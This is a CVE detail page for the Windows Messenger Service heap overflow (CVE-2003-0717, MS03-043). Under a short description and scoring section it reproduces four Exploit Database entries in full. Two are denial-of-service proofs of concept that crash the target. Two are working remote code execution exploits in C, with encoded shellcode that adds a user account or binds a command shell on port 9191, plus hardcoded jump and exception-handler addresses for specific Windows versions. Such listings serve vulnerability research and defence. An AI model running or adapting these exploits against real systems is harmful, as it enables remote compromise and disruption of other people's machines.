CVE-2003-0717 : Detail

CVE-2003-0717

95.29%V3
Network
2003-10-17
02h00 +00:00
2018-10-12
17h57 +00:00

CVE Descriptions

The Messenger Service for Windows NT through Server 2003 does not properly verify the length of the message, which allows remote attackers to execute arbitrary code via a buffer overflow attack.

CVE Information

Metrics

Metrics Score Severity CVSS Vector Source
V2 7.5 AV:N/AC:L/Au:N/C:P/I:P/A:P [email protected]

EPSS

EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.

EPSS Score

The EPSS model produces a probability score between 0 and 1 (0 to 100%). The higher the score, the greater the probability that the vulnerability will be exploited.

EPSS Percentile

The percentile ranks CVEs by their EPSS score. For example, a CVE in the 95th percentile by EPSS score is more likely to be exploited than 95% of all other CVEs. The percentile is therefore used to compare the EPSS score of one CVE against those of all other CVEs.

Exploit information

Exploit Database EDB-ID : 385

Publication date : 2004-08-07 22h00 +00:00
Author : VeNoMouS
EDB Verified : Yes

/* Mon Oct 20 14:26:55 NZDT 2003 Re-written By VeNoMouS to be ported to linux, and tidy it up a little. This was only like a 5 minute port but it works and has been tested. venomgen-x.co.nz <mailto:venomgen-x.co.nz> greets to str0ke and defy DoS Proof of Concept for MS03-043 - exploitation shouldn't be too hard. Launching it one or two times against the target should make the machine reboot. Tested against a Win2K SP4. "The vulnerability results because the Messenger Service does not properly validate the length of a message before passing it to the allocated buffer" according to MS bulletin. Digging into it a bit more, we find that when a character 0x14 in encountered in the 'body' part of the message, it is replaced by a CR+LF. The buffer allocated for this operation is twice the size of the string, which is the way to go, but is then copied to a buffer which was only allocated 11CAh bytes. Thanks to that, we can bypass the length checks and overflow the fixed size buffer. Credits go to LSD :) */ #include <stdio.h> #include <stdlib.h> #include <string.h> #include <unistd.h> #include <errno.h> #include <time.h> #include <sys/types.h> #include <sys/socket.h> #include <arpa/inet.h> // Packet format found thanks to a bit a sniffing static unsigned char packet_header[] = "\x04\x00\x28\x00" "\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" "\x00\x00\x00\x00\xf8\x91\x7b\x5a\x00\xff\xd0\x11\xa9\xb2\x00\xc0" "\x4f\xb6\xe6\xfc" "\xff\xff\xff\xff" // 40 : unique id over 16 bytes ? 
"\xff\xff\xff\xff" "\xff\xff\xff\xff" "\xff\xff\xff\xff" "\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00" "\x00\x00\xff\xff\xff\xff" "\xff\xff\xff\xff" // 74 : fields length "\x00\x00"; unsigned char field_header[] = "\xff\xff\xff\xff" // 0 : field length "\x00\x00\x00\x00" "\xff\xff\xff\xff"; // 8 : field length int usage(char *name) { printf("Proof of Concept for Windows Messenger Service Overflow..\n"); printf("- Originally By Hanabishi Recca - reccamail.ru\n\n <mailto:reccamail.ru\n\n> "); printf("- Ported to linux by VeNoMouS..\n"); printf("- venomgen-x.co.nz\n\n\n <mailto:venomgen-x.co.nz\n\n\n> "); printf("example : %s -d yourputtersux -i 10.33.10.4 -s n0nlameputer\n",name); printf("\n-d <dest netbios name>\t-i <dest netbios ip>\n"); printf("-s <src netbios name>\n"); return 1; } int main(int argc,char *argv[]) { int i, packet_size, fields_size, s; unsigned char packet[8192]; struct sockaddr_in addr; char from[57],machine[57],c; char body[4096] = "*** MESSAGE ***"; if(argc <= 2) { usage(argv[0]); exit(0); } while ((c = getopt (argc, argv, "d:i:s:h")) != EOF) switch(c) { case 'd': strncpy(machine,optarg,sizeof(machine)); printf("Machine is %s\n",machine); break; case 'i': memset(&addr, 0,sizeof(addr)); addr.sin_family = AF_INET; addr.sin_addr.s_addr = inet_addr(optarg); addr.sin_port = htons(135); break; case 's': strncpy(from,optarg,sizeof(from)); break; case 'h': usage(argv[0]); exit(0); break; } // A few conditions : // 0 <= strlen(from) + strlen(machine) <= 56 // max fields size 3992 if(!addr.sin_addr.s_addr) { printf("Ummm MOFO we need a dest IP...\n"); exit(0); } if(!strlen(machine)) { printf("Ummmm we also need the dest netbios name bro...\n"); exit(0); } if(!strlen(from)) strcpy(from,"tolazytotype"); memset(packet,0, sizeof(packet)); packet_size = 0; memcpy(&packet[packet_size], packet_header, sizeof(packet_header) - 1); packet_size += sizeof(packet_header) - 1; i = strlen(from) + 1; *(unsigned int *)(&field_header[0]) = i; *(unsigned int 
*)(&field_header[8]) = i; memcpy(&packet[packet_size], field_header, sizeof(field_header) - 1); packet_size += sizeof(field_header) - 1; strcpy(&packet[packet_size], from); packet_size += (((i - 1) >> 2) + 1) << 2; // padded to a multiple of 4 i = strlen(machine) + 1; *(unsigned int *)(&field_header[0]) = i; *(unsigned int *)(&field_header[8]) = i; memcpy(&packet[packet_size], field_header, sizeof(field_header) - 1); packet_size += sizeof(field_header) - 1; strcpy(&packet[packet_size], machine); packet_size += (((i - 1) >> 2) + 1) << 2; // padded to a multiple of 4 fprintf(stdout, "Max 'body' size (incl. terminal NULL char) = %d\n", 3992 - packet_size + sizeof(packet_header) - sizeof(field_header)); memset(body, 0x14, sizeof(body)); body[3992 - packet_size + sizeof(packet_header) - sizeof(field_header) - 1] = '\0'; i = strlen(body) + 1; *(unsigned int *)(&field_header[0]) = i; *(unsigned int *)(&field_header[8]) = i; memcpy(&packet[packet_size], field_header, sizeof(field_header) - 1); packet_size += sizeof(field_header) - 1; strcpy(&packet[packet_size], body); packet_size += i; fields_size = packet_size - (sizeof(packet_header) - 1); *(unsigned int *)(&packet[40]) = time(NULL); *(unsigned int *)(&packet[74]) = fields_size; fprintf(stdout, "Total length of strings = %d\nPacket size = %d\nFields size = %d\n", strlen(from) + strlen(machine) + strlen(body),packet_size, fields_size); if ((s = socket (AF_INET, SOCK_DGRAM, 0)) == -1 ) { perror("Error socket() - "); exit(0); } if (sendto(s, packet, packet_size, 0, (struct sockaddr *)&addr, sizeof(addr)) == -1) { perror("Error sendto() - "); exit(0); } exit(0); } // milw0rm.com [2004-08-08]
Exploit Database EDB-ID : 111

Publication date : 2003-10-17 22h00 +00:00
Author : LSD-PLaNET
EDB Verified : Yes

/* DoS Proof of Concept for MS03-043 - exploitation shouldn't be too hard. Launching it one or two times against the target should make the machine reboot. Tested against a Win2K SP4. "The vulnerability results because the Messenger Service does not properly validate the length of a message before passing it to the allocated buffer" according to MS bulletin. Digging into it a bit more, we find that when a character 0x14 in encountered in the 'body' part of the message, it is replaced by a CR+LF. The buffer allocated for this operation is twice the size of the string, which is the way to go, but is then copied to a buffer which was only allocated 11CAh bytes. Thanks to that, we can bypass the length checks and overflow the fixed size buffer. Credits go to LSD :) */ #include <stdio.h> #include <winsock.h> #include <string.h> #include <time.h> // Packet format found thanks to a bit a sniffing static unsigned char packet_header[] = "\x04\x00\x28\x00" "\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" "\x00\x00\x00\x00\xf8\x91\x7b\x5a\x00\xff\xd0\x11\xa9\xb2\x00\xc0" "\x4f\xb6\xe6\xfc" "\xff\xff\xff\xff" // @40 : unique id over 16 bytes ? 
"\xff\xff\xff\xff" "\xff\xff\xff\xff" "\xff\xff\xff\xff" "\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00" "\x00\x00\xff\xff\xff\xff" "\xff\xff\xff\xff" // @74 : fields length "\x00\x00"; // Exploit downloaded on www.k-otik.com unsigned char field_header[] = "\xff\xff\xff\xff" // @0 : field length "\x00\x00\x00\x00" "\xff\xff\xff\xff"; // @8 : field length int main(int argc,char *argv[]) { int i, packet_size, fields_size, s; unsigned char packet[8192]; struct sockaddr_in addr; // A few conditions : // 0 <= strlen(from) + strlen(machine) <= 56 // max fields size 3992 char from[] = "RECCA"; char machine[] = "ZEUS"; char body[4096] = "*** MESSAGE ***"; WSADATA wsaData; WSAStartup(0x0202, &wsaData); ZeroMemory(&addr, sizeof(addr)); addr.sin_family = AF_INET; addr.sin_addr.s_addr = inet_addr("192.168.186.3"); addr.sin_port = htons(135); ZeroMemory(packet, sizeof(packet)); packet_size = 0; memcpy(&packet[packet_size], packet_header, sizeof(packet_header) - 1); packet_size += sizeof(packet_header) - 1; i = strlen(from) + 1; *(unsigned int *)(&field_header[0]) = i; *(unsigned int *)(&field_header[8]) = i; memcpy(&packet[packet_size], field_header, sizeof(field_header) - 1); packet_size += sizeof(field_header) - 1; strcpy(&packet[packet_size], from); packet_size += (((i - 1) >> 2) + 1) << 2; // padded to a multiple of 4 i = strlen(machine) + 1; *(unsigned int *)(&field_header[0]) = i; *(unsigned int *)(&field_header[8]) = i; memcpy(&packet[packet_size], field_header, sizeof(field_header) - 1); packet_size += sizeof(field_header) - 1; strcpy(&packet[packet_size], machine); packet_size += (((i - 1) >> 2) + 1) << 2; // padded to a multiple of 4 fprintf(stdout, "Max 'body' size (incl. 
terminal NULL char) = %d\n", 3992 - packet_size + sizeof(packet_header) - sizeof(field_header)); memset(body, 0x14, sizeof(body)); body[3992 - packet_size + sizeof(packet_header) - sizeof(field_header) - 1] = '\0'; i = strlen(body) + 1; *(unsigned int *)(&field_header[0]) = i; *(unsigned int *)(&field_header[8]) = i; memcpy(&packet[packet_size], field_header, sizeof(field_header) - 1); packet_size += sizeof(field_header) - 1; strcpy(&packet[packet_size], body); packet_size += i; fields_size = packet_size - (sizeof(packet_header) - 1); *(unsigned int *)(&packet[40]) = time(NULL); *(unsigned int *)(&packet[74]) = fields_size; fprintf(stdout, "Total length of strings = %d\nPacket size = %d\nFields size = %d\n", strlen(from) + strlen(machine) + strlen(body), packet_size, fields_size); /* for (i = 0; i < packet_size; i++) { if (i && ((i & 1) == 0)) fprintf(stdout, " "); if (i && ((i & 15) == 0)) fprintf(stdout, "\n"); fprintf(stdout, "%02x", packet[i]); } fprintf(stdout, "\n"); */ if ((s = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP)) == -1) exit(EXIT_FAILURE); if (sendto(s, packet, packet_size, 0, (struct sockaddr *)&addr, sizeof(addr)) == -1) exit(EXIT_FAILURE); /* if (recvfrom(s, packet, sizeof(packet) - 1, 0, NULL, NULL) == -1) exit(EXIT_FAILURE); */ exit(EXIT_SUCCESS); } // milw0rm.com [2003-10-18]
Exploit Database EDB-ID : 135

Publication date : 2003-12-15 23h00 +00:00
Author : MrNice
EDB Verified : Yes

/*******************************************************************/ /* [Crpt] MS03-043 - Messenger exploit by MrNice [Crpt] */ /* --------------------------------------------------------------- */ /* */ /* This Sploit use the unhandledexceptionfilter to redirect */ /* the execution. When overflow occur we have : */ /* */ /* mov eax,esi+8 */ /* mov ecx,esi+Ch */ /* mov dword ptr ds:[ecx],eax */ /* */ /* so we control ecx and edx and we can write 4 bytes */ /* where we want. */ /* If we try to write in a not writable memory zone, an */ /* excepetion is lauched and unhandledexceptionfilter too. */ /* */ /* A part of unhandledexceptionfilter : */ /* */ /* mov eax, dword_0_77ECF44C(=where) */ /* cmp eax, ebx */ /* jz short loc_0_77EA734C */ /* push esi */ /* call eax */ /* */ /* So we write the "WHAT"(=jmp esi+4Ch) at */ /* the "WHERE"(=77EA734C here) and when the exception occur */ /* the unhandledexceptionfilter is lauched so when call eax */ /* occur, it execute our code. */ /* */ /* Thx Kotik who coded the proof of concept,and Metasploit */ /* for Shellcode and last but not least kralor,Scurt from Crpt */ /* */ /* Tested on win2k FR SP0 */ /* */ /* */ /*******************************************************************/ #ifdef _WIN32 #include <winsock.h> #include <windows.h> #pragma comment (lib,"ws2_32") #else #include <sys/types.h> #include <netinet/in.h> #include <sys/socket.h> #include <stdio.h> #include <stdlib.h> #include <arpa/inet.h> #include <netdb.h> #include <sys/timeb.h> #include <string.h> #endif static unsigned char packet_header[] = "\x04\x00\x28\x00" "\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" "\x00\x00\x00\x00\xf8\x91\x7b\x5a\x00\xff\xd0\x11\xa9\xb2\x00\xc0" "\x4f\xb6\xe6\xfc" "\xff\xff\xff\xff" "\xff\xff\xff\xff" "\xff\xff\xff\xff" "\xff\xff\xff\xff" "\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00" "\x00\x00\xff\xff\xff\xff" "\xff\xff\xff\xff" "\x00\x00"; unsigned char field_header[] = "\xff\xff\xff\xff" 
"\x00\x00\x00\x00" "\xff\xff\xff\xff"; unsigned char ShellCode[] = // XorDecode 23 bytes "\xEB\x10\x5A\x4A\x33\xC9\x66\xB9\x3E\x01\x80\x34\x0A\x96\xE2\xFA" "\xEB\x05\xE8\xEB\xFF\xFF\xFF" // AddUser:X Pass:X "\xf0\x17\x7a\x16\x96\x1f\x70\x7e\x21\x96\x96\x96\x1f\x90\x1f\x55" "\xc5\xfe\xe8\x4e\x74\xe5\x7e\x2b\x96\x96\x96\x1f\xd0\x9a\xc5\xfe" "\x18\xd8\x98\x7a\x7e\x39\x96\x96\x96\x1f\xd0\x9e\xa7\x4d\xc5\xfe" "\xe6\xff\xa5\xa4\xfe\xf8\xf3\xe2\xf7\xc2\x69\x46\x1f\xd0\x92\x1f" "\x55\xc5\xfe\xc8\x49\xea\x5b\x7e\x1a\x96\x96\x96\x1f\xd0\x86\xc5" "\xfe\x41\xab\x9a\x55\x7e\xe8\x96\x96\x96\x1f\xd0\x82\xa7\x56\xa7" "\x4d\xd5\xc6\xfe\xe4\x96\xe5\x96\xfe\xe2\x96\xf9\x96\xfe\xe4\x96" "\xf7\x96\xfe\xe5\x96\xe2\x96\xfe\xf8\x96\xff\x96\xfe\xfb\x96\xff" "\x96\xfe\xd7\x96\xf2\x96\x1f\xf0\x8a\xc6\xfe\xce\x96\x96\x96\x1f" "\x77\x1f\xd8\x8e\xfe\x96\x96\xca\x96\xc6\xc5\xc6\xc6\xc5\xc6\xc7" "\xc7\x1f\x77\xc6\xc2\xc7\xc5\xc6\x69\xc0\x86\x1d\xd8\x8e\xdf\xdf" "\xc7\x1f\x77\xfc\x97\xc7\xfc\x95\x69\xe0\x8a\xfc\x96\x69\xc0\x82" "\x69\xc0\x9a\xc0\xfc\xa6\xcf\xf2\x1d\x97\x1d\xd6\x9a\x1d\xe6\x8a" "\x3b\x1d\xd6\x9e\xc8\x54\x92\x96\xc5\xc3\xc0\xc1\x1d\xfa\xb2\x8e" "\x1d\xd3\xaa\x1d\xc2\x93\xee\x97\x7c\x1d\xdc\x8e\x1d\xcc\xb6\x97" "\x7d\x75\xa4\xdf\x1d\xa2\x1d\x97\x78\xa7\x69\x6a\xa7\x56\x3a\xae" "\x76\xe2\x91\x57\x59\x9b\x97\x51\x7d\x64\xad\xea\xb2\x82\xe3\x77" "\x1d\xcc\xb2\x97\x7d\xf0\x1d\x9a\xdd\x1d\xcc\x8a\x97\x7d\x1d\x92" "\x1d\x97\x7e\x7d\x94\xa7\x56\x1f\x7c\xc9\xc8\xcb\xcd\x54\x9e\x96"; int main(int argc,char *argv[]) { int i, packet_size, fields_size, s,sp; unsigned char packet[8192]; struct sockaddr_in addr; // A few conditions : // 0 <= strlen(from) + strlen(machine) <= 56 // max fields size 3992 char from[] = "RECCA"; char machine[] = "ZEUS"; char body[4096] = "*** MESSAGE ***"; #ifdef _WIN32 WSADATA wsaData; #endif if(argc<2) { printf("\t [Crpt] MS03-043 - Messenger exploit by MrNice [Crpt]\n"); printf("\t\t www.coromputer.net && Undernet #coromputer\n"); 
printf("---------------------------------------------------------------\n"); printf("Tested on Windows 2000 French Sp0\n\n"); printf("Downloaded from www.K-OTik.com\n"); printf("Syntax : %s <ip>\n",argv[0]); return -1; } #ifdef _WIN32 if(WSAStartup(0x101,&wsaData)) { printf("error: unable to load winsock.\n"); return -1; } #endif memset(&addr,0x00,sizeof(addr)); addr.sin_family = AF_INET; addr.sin_addr.s_addr = inet_addr(argv[1]); addr.sin_port = htons(135); memset(packet,0x00,sizeof(packet)); packet_size = 0; memcpy(&packet[packet_size], packet_header, sizeof(packet_header) - 1); packet_size += sizeof(packet_header) - 1; i = strlen(from) + 1; *(unsigned int *)(&field_header[0]) = i; *(unsigned int *)(&field_header[8]) = i; memcpy(&packet[packet_size], field_header, sizeof(field_header) - 1); packet_size += sizeof(field_header) - 1; strcpy(&packet[packet_size], from); packet_size += (((i - 1) >> 2) + 1) << 2; // padded to a multiple of 4 i = strlen(machine) + 1; *(unsigned int *)(&field_header[0]) = i; *(unsigned int *)(&field_header[8]) = i; memcpy(&packet[packet_size], field_header, sizeof(field_header) - 1); packet_size += sizeof(field_header) - 1; strcpy(&packet[packet_size], machine); packet_size += (((i - 1) >> 2) + 1) << 2; // padded to a multiple of 4 printf("Max 'body' size (incl. 
terminal NULL char) = %d\n", 3992 - packet_size + sizeof(packet_header) - sizeof(field_header)); memset(body, 0x14, sizeof(body)); body[2263]=(char)0x90; body[2264]=(char)0x90; body[2265]=(char)0x90; body[2266]=(char)0x90; body[2267]=(char)0x90; body[2268]=(char)0x90; //jmp 8 bytes plus loing body[2269]=(char)0xeb; body[2270]=(char)0x08; //WHAT CRYPTSVC.dll Win2k sp0 FRENCH body[2271]=(char)0x48; body[2272]=(char)0x65; body[2273]=(char)0x87; body[2274]=(char)0x76; //WHERE win2k sp0 FRENCH body[2275]=(char)0x4C; body[2276]=(char)0xF4; body[2277]=(char)0xEC; body[2278]=(char)0x77; for(i=2279;i<2606;i++) body[i]=ShellCode[i-2279]; body[3992 - packet_size + sizeof(packet_header) - sizeof(field_header) - 1] = '\0'; i = strlen(body) + 1; *(unsigned int *)(&field_header[0]) = i; *(unsigned int *)(&field_header[8]) = i; memcpy(&packet[packet_size], field_header, sizeof(field_header) - 1); packet_size += sizeof(field_header) - 1; strcpy(&packet[packet_size], body); packet_size += i; fields_size = packet_size - (sizeof(packet_header) - 1); *(unsigned int *)(&packet[40]) = time(NULL); *(unsigned int *)(&packet[74]) = fields_size; printf("Total length of strings = %d\nPacket size = %d\nFields size = %d\n", strlen(from) + strlen(machine) + strlen(body), packet_size, fields_size); if ((s = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP)) == -1) { printf("error: unable to create socket\n"); return -1; } if (sendto(s, packet, packet_size, 0, (struct sockaddr *)&addr, sizeof(addr)) == -1) { printf("error: unable to send packet\n"); return -1; } return 0; } // milw0rm.com [2003-12-16]
Exploit Database EDB-ID : 23247

Publication date : 2003-10-24 22h00 +00:00
Author : Adik
EDB Verified : Yes

// source: https://www.securityfocus.com/bid/8826/info Microsoft Windows Messenger Service is prone to a remotely exploitable buffer overrun vulnerability. This is due to insufficient bounds checking of messages before they are passed to an internal buffer. Exploitation could result in a denial of service or in execution of malicious code in Local System context, potentially allowing for full system compromise. /************************************************************************************ Exploit for Microsoft Windows Messenger Heap Overflow (MS03-043) based on PoC DoS by [email protected] by Adik < netmaniac [at] hotmail.kg > http://netninja.to.kg Binds command shell on port 9191 Tested on Windows XP Professional SP1 English version Windows 2000 Professional SP3 English version access violation -> unhandledexceptionfilter -> -> call [esi+48h]/call [edi+6ch] (win2kSP3/WinXPSP1) -> longjmp -> shellcode attach debugger and c how it flows :) worked fine for me -[25/Oct/2003]- ************************************************************************************/ #include <stdio.h> #include <winsock.h> #include <string.h> #include <time.h> #pragma comment(lib,"ws2_32") #define VER "0.7" /**************** bind shellcode spawns shell on port 9191 ************************/ unsigned char kyrgyz_bind_code[] = { 0xEB,0x03,0x5D,0xEB,0x05,0xE8,0xF8,0xFF,0xFF,0xFF,0x8B,0xC5,0x83,0xC0,0x11,0x33,0xC9,0x66,0xB9, 0xC9,0x01,0x80,0x30,0x88,0x40,0xE2,0xFA, 0xDD, 0x03, 0x64, 0x03, 0x7C, 0x09, 0x64, 0x08, 0x88, 0x88, 0x88, 0x60, 0xC4, 0x89, 0x88, 0x88, 0x01, 0xCE, 0x74, 0x77, 0xFE, 0x74, 0xE0, 0x06, 0xC6, 0x86, 0x64, 0x60, 0xD9, 0x89, 0x88, 0x88, 0x01, 0xCE, 0x4E, 0xE0, 0xBB, 0xBA, 0x88, 0x88, 0xE0, 0xFF, 0xFB, 0xBA, 0xD7, 0xDC, 0x77, 0xDE, 0x4E, 0x01, 0xCE, 0x70, 0x77, 0xFE, 0x74, 0xE0, 0x25, 0x51, 0x8D, 0x46, 0x60, 0xB8, 0x89, 0x88, 0x88, 0x01, 0xCE, 0x5A, 0x77, 0xFE, 0x74, 0xE0, 0xFA, 0x76, 0x3B, 0x9E, 0x60, 0xA8, 0x89, 0x88, 0x88, 0x01, 0xCE, 0x46, 0x77, 0xFE, 0x74, 0xE0, 0x67, 
0x46, 0x68, 0xE8, 0x60, 0x98, 0x89, 0x88, 0x88, 0x01, 0xCE, 0x42, 0x77, 0xFE, 0x70, 0xE0, 0x43, 0x65, 0x74, 0xB3, 0x60, 0x88, 0x89, 0x88, 0x88, 0x01, 0xCE, 0x7C, 0x77, 0xFE, 0x70, 0xE0, 0x51, 0x81, 0x7D, 0x25, 0x60, 0x78, 0x88, 0x88, 0x88, 0x01, 0xCE, 0x78, 0x77, 0xFE, 0x70, 0xE0, 0x2C, 0x92, 0xF8, 0x4F, 0x60, 0x68, 0x88, 0x88, 0x88, 0x01, 0xCE, 0x64, 0x77, 0xFE, 0x70, 0xE0, 0x2C, 0x25, 0xA6, 0x61, 0x60, 0x58, 0x88, 0x88, 0x88, 0x01, 0xCE, 0x60, 0x77, 0xFE, 0x70, 0xE0, 0x6D, 0xC1, 0x0E, 0xC1, 0x60, 0x48, 0x88, 0x88, 0x88, 0x01, 0xCE, 0x6A, 0x77, 0xFE, 0x70, 0xE0, 0x6F, 0xF1, 0x4E, 0xF1, 0x60, 0x38, 0x88, 0x88, 0x88, 0x01, 0xCE, 0x5E, 0xBB, 0x77, 0x09, 0x64, 0x7C, 0x89, 0x88, 0x88, 0xDC, 0xE0, 0x89, 0x89, 0x88, 0x88, 0x77, 0xDE, 0x7C, 0xD8, 0xD8, 0xD8, 0xD8, 0xC8, 0xD8, 0xC8, 0xD8, 0x77, 0xDE, 0x78, 0x03, 0x50, 0xDF, 0xDF, 0xE0, 0x8A, 0x88, 0xAB, 0x6F, 0x03, 0x44, 0xE2, 0x9E, 0xD9, 0xDB, 0x77, 0xDE, 0x64, 0xDF, 0xDB, 0x77, 0xDE, 0x60, 0xBB, 0x77, 0xDF, 0xD9, 0xDB, 0x77, 0xDE, 0x6A, 0x03, 0x58, 0x01, 0xCE, 0x36, 0xE0, 0xEB, 0xE5, 0xEC, 0x88, 0x01, 0xEE, 0x4A, 0x0B, 0x4C, 0x24, 0x05, 0xB4, 0xAC, 0xBB, 0x48, 0xBB, 0x41, 0x08, 0x49, 0x9D, 0x23, 0x6A, 0x75, 0x4E, 0xCC, 0xAC, 0x98, 0xCC, 0x76, 0xCC, 0xAC, 0xB5, 0x01, 0xDC, 0xAC, 0xC0, 0x01, 0xDC, 0xAC, 0xC4, 0x01, 0xDC, 0xAC, 0xD8, 0x05, 0xCC, 0xAC, 0x98, 0xDC, 0xD8, 0xD9, 0xD9, 0xD9, 0xC9, 0xD9, 0xC1, 0xD9, 0xD9, 0x77, 0xFE, 0x4A, 0xD9, 0x77, 0xDE, 0x46, 0x03, 0x44, 0xE2, 0x77, 0x77, 0xB9, 0x77, 0xDE, 0x5A, 0x03, 0x40, 0x77, 0xFE, 0x36, 0x77, 0xDE, 0x5E, 0x63, 0x16, 0x77, 0xDE, 0x9C, 0xDE, 0xEC, 0x29, 0xB8, 0x88, 0x88, 0x88, 0x03, 0xC8, 0x84, 0x03, 0xF8, 0x94, 0x25, 0x03, 0xC8, 0x80, 0xD6, 0x4A, 0x8C, 0x88, 0xDB, 0xDD, 0xDE, 0xDF, 0x03, 0xE4, 0xAC, 0x90, 0x03, 0xCD, 0xB4, 0x03, 0xDC, 0x8D, 0xF0, 0x8B, 0x5D, 0x03, 0xC2, 0x90, 0x03, 0xD2, 0xA8, 0x8B, 0x55, 0x6B, 0xBA, 0xC1, 0x03, 0xBC, 0x03, 0x8B, 0x7D, 0xBB, 0x77, 0x74, 0xBB, 0x48, 0x24, 0xB2, 0x4C, 0xFC, 0x8F, 0x49, 0x47, 0x85, 0x8B, 0x70, 0x63, 0x7A, 0xB3, 0xF4, 0xAC, 
0x9C, 0xFD, 0x69, 0x03, 0xD2, 0xAC, 0x8B, 0x55, 0xEE, 0x03, 0x84, 0xC3, 0x03, 0xD2, 0x94, 0x8B, 0x55, 0x03, 0x8C, 0x03, 0x8B, 0x4D, 0x63, 0x8A, 0xBB, 0x48, 0x03, 0x5D, 0xD7, 0xD6, 0xD5, 0xD3, 0x4A, 0x8C, 0x88 }; int PreparePacket(char *packet,int sizeofpacket, DWORD Jmp, DWORD SEH); int main(int argc,char *argv[]) { int sockUDP,ver,c, packetsz,cnt; unsigned char packet[8192]; struct sockaddr_in targetUDP; WSADATA wsaData; struct { char os[30]; DWORD SEH; DWORD JMP; } targetOS[] = { { "Windows 2000 SP 3 (en)", 0x77ee044c, // unhandledexceptionfilter pointer 0x768d693e // cryptsvc.dll call [esi+48] 0x768d693e }, { "Windows XP SP 1 (en)", 0x77ed73b4, 0x7804bf52 //rpcrt4.dll call [edi+6c] }/*, { //not tested "Windows XP SP 0 (en)", 0x77ed63b4, 0x7802ff3d //rpcrt4 call [edi+6c] }*/ }; printf("\n-=[ MS Messenger Service Heap Overflow Exploit (MS03-043) ver %s ]=-\n\n" " by Adik < netmaniac [at] hotmail.KG >\n http://netninja.to.kg\n\n", VER); if(argc < 3) { printf(" Target OS version:\n\n"); for(c=0;c<(sizeof(targetOS)/sizeof(targetOS[0]));c++) printf(" [%d]\t%s\n",c,targetOS[c].os); printf("\n Usage: %s [TargetIP] [ver: 0 | 1]\n" " eg: msgr.exe 192.168.63.130 0\n",argv[0]); return 1; } ver = atoi(argv[2]); printf("[*] Target: \t IP: %s\t OS: %s\n" "[*] UEF: \t 0x%x\n" "[*] JMP: \t 0x%x\n\n", argv[1],targetOS[ver].os, targetOS[ver].SEH, targetOS[ver].JMP); WSAStartup(0x0202, &wsaData); printf("[*] WSAStartup initialized...\n"); ZeroMemory(&targetUDP, sizeof(targetUDP)); targetUDP.sin_family = AF_INET; targetUDP.sin_addr.s_addr = inet_addr(argv[1]); targetUDP.sin_port = htons(135); packetsz = PreparePacket(packet,sizeof(packet),targetOS[ver].JMP,targetOS[ver].SEH); if ((sockUDP = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP)) == -1) { printf("[x] Socket not initialized! 
Exiting...\n"); return 1; } printf("[*] Socket initialized...\n"); printf("[*] Injecting packet into a remote process...\n"); if (sendto(sockUDP, packet, packetsz, 0, (struct sockaddr *)&targetUDP, sizeof(targetUDP)) == -1) { printf("[x] Failed to inject packet! Exiting...\n"); return 1; } else printf("[*] Packet injected...\n"); printf("[i] Try connecting to %s:9191\n\n",argv[1]); return 0; } /************************************************************************************/ int PreparePacket(char *packet,int sizeofpacket, DWORD Jmp, DWORD SEH) { static unsigned char packet_header[] = "\x04\x00\x28\x00" "\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" "\x00\x00\x00\x00\xf8\x91\x7b\x5a\x00\xff\xd0\x11\xa9\xb2\x00\xc0" "\x4f\xb6\xe6\xfc\xff\xff\xff\xff\x42\x69\x73\x68\x6b\x65\x6b\x32" "\x30\x30\x33\xff\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00" "\x00\x00\xff\xff\xff\xff\xff\xff\xff\xff\x00\x00"; unsigned char field_header[] = "\xff\xff\xff\xff\x00\x00\x00\x00" "\xff\xff\xff\xff"; int packet_size,i,fields_size; char from[] = "NETMANIAC"; char machine[] = "ADIK"; char longjmp[] ="\x90\x90\x90\x90\x90" "\xEB\x03\x58\xEB\x05\xE8\xF8\xFF\xFF\xFF" "\xB9\xFF\xFF\xFF\xFF\x81\xE9\x7F\xEE\xFF" "\xFF\x2B\xC1\xFF\xE0"; char shortjmp[] ="\x90\x90\x90\x90\xEB\x10\x90\x90\x90\x90\x90\x90"; char body[5000] = "*** MESSAGE ***";//4096 ZeroMemory(packet, sizeofpacket); packet_size = 0; memcpy(&packet[packet_size], packet_header, sizeof(packet_header) - 1); packet_size += sizeof(packet_header) - 1; i = strlen(from) + 1; *(unsigned int *)(&field_header[0]) = i; *(unsigned int *)(&field_header[8]) = i; memcpy(&packet[packet_size], field_header, sizeof(field_header) - 1); packet_size += sizeof(field_header) - 1; strcpy(&packet[packet_size], from); packet_size += (((i - 1) >> 2) + 1) << 2; i = strlen(machine) + 1; *(unsigned int *)(&field_header[0]) = i; *(unsigned int *)(&field_header[8]) = i; memcpy(&packet[packet_size], field_header, sizeof(field_header) - 1); 
packet_size += sizeof(field_header) - 1; strcpy(&packet[packet_size], machine); packet_size += (((i - 1) >> 2) + 1) << 2; memset(body, 0x90, 2296); memcpy(&body[500],kyrgyz_bind_code,sizeof(kyrgyz_bind_code)); memset(&body[2296],0x14,1800); memcpy(&body[2296+1110],shortjmp,sizeof(shortjmp)); *(DWORD *)&body[2296+1121] = Jmp; *(DWORD *)&body[2296+1125] = SEH; memcpy(&body[2296+1129],longjmp,sizeof(longjmp)-1); fprintf(stdout, "[*] Msg body size: %d\n", 3656 - packet_size + sizeof(packet_header) - sizeof(field_header)); body[3656 - packet_size + sizeof(packet_header) - sizeof(field_header) - 1] = '\0'; i = strlen(body) + 1; *(unsigned int *)(&field_header[0]) = i; *(unsigned int *)(&field_header[8]) = i; memcpy(&packet[packet_size], field_header, sizeof(field_header) - 1); packet_size += sizeof(field_header) - 1; strcpy(&packet[packet_size], body); packet_size += i; fields_size = packet_size - (sizeof(packet_header) - 1); *(unsigned int *)(&packet[40]) = time(NULL); *(unsigned int *)(&packet[74]) = fields_size; return packet_size; } /************************************************************************************/

Products Mentioned

Configuration 0

Microsoft>>Windows_2000 >> Version *

Microsoft>>Windows_2000 >> Version *

